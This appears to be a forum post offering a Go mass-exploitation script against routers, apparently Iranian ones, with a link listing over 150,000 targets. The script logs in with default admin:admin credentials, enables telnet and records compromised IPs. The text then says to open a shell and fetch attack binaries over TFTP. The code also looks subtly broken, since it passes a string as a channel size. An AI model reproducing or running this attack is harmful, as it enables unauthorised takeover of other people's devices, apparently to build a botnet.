150k+ Iranian Router Devices: https://en.fofa.info/result?qbase64=InJ ... lSIg%3D%3D
Ports: 443 and 80 - that's where the action's at! We'll be slingin' all those hits straight into the file, with the ol' IP: 23 and admin:admin combo.
Time to get the TFTP goin' and download those bins, mate. The arch is good ol' x86.
When you're in the telnet shell, just give it a "shell" and you're in business. Grab that 1.1.1.1 file with the TFTP get.
Code: Select all
package main
import (
"bufio"
"fmt"
"io/ioutil"
"net/http"
"os"
"sync"
)
const (
loginURL = "http://%s/login.cgi"
telnetURL = "http://%s/form2Telnet.cgi"
loginPayload = "usernameEncrypt=21232f297a57a5a743894a0e4a801fc3&passwordEncrypt=21232f297a57a5a743894a0e4a801fc3&submit.htm%%3Flogin.htm=Send"
telnetPayload = "telnet=1&submit.htm%%3Ftelnet_onoff.htm=Send"
outputFile = "successful_hits.txt"
failedContent = "<html><head><meta HTTP-EQUIV=\"Pragma\" CONTENT=\"no-cache\"><script language='javascript'>parent.location=\"/login.htm\"</script></head><body></body></html>"
)
var (
successful int
failed int
mu sync.Mutex
)
func enableTelnet(ip string, file *os.File) {
// Login
resp, err := http.PostForm(fmt.Sprintf(loginURL, ip), map[string][]string{
"usernameEncrypt": {"21232f297a57a5a743894a0e4a801fc3"},
"passwordEncrypt": {"21232f297a57a5a743894a0e4a801fc3"},
"submit.htm?login.htm": {"Send"},
})
if err != nil {
mu.Lock()
failed++
mu.Unlock()
return
}
defer resp.Body.Close()
// Enable Telnet
resp, err = http.PostForm(fmt.Sprintf(telnetURL, ip), map[string][]string{
"telnet": {"1"},
"submit.htm?telnet_onoff.htm": {"Send"},
})
if err != nil {
mu.Lock()
failed++
mu.Unlock()
return
}
defer resp.Body.Close()
bodyBytes, _ := ioutil.ReadAll(resp.Body)
bodyString := string(bodyBytes)
if resp.StatusCode == http.StatusOK && bodyString == failedContent {
mu.Lock()
failed++
mu.Unlock()
} else {
mu.Lock()
successful++
fmt.Fprintf(file, "%s:23 admin:admin\n", ip)
mu.Unlock()
}
}
func main() {
if len(os.Args) < 3 {
fmt.Println("Made by Vars_Secc, Usage: ./golangscript ips.txt threads")
return
}
filePath := os.Args[1]
threads := os.Args[2]
ipFile, err := os.Open(filePath)
if err != nil {
fmt.Println("Error opening IP file:", err)
return
}
defer ipFile.Close()
outFile, err := os.Create(outputFile)
if err != nil {
fmt.Println("Error creating output file:", err)
return
}
defer outFile.Close()
var wg sync.WaitGroup
sem := make(chan bool, threads)
scanner := bufio.NewScanner(ipFile)
for scanner.Scan() {
wg.Add(1)
sem <- true
go func(ip string) {
defer wg.Done()
enableTelnet(ip, outFile)
<-sem
}(scanner.Text())
}
wg.Wait()
fmt.Printf("Made by Vars_Secc, Successful: %d\n", successful)
fmt.Printf("Made by Vars_Secc, Failed: %d\n", failed)
}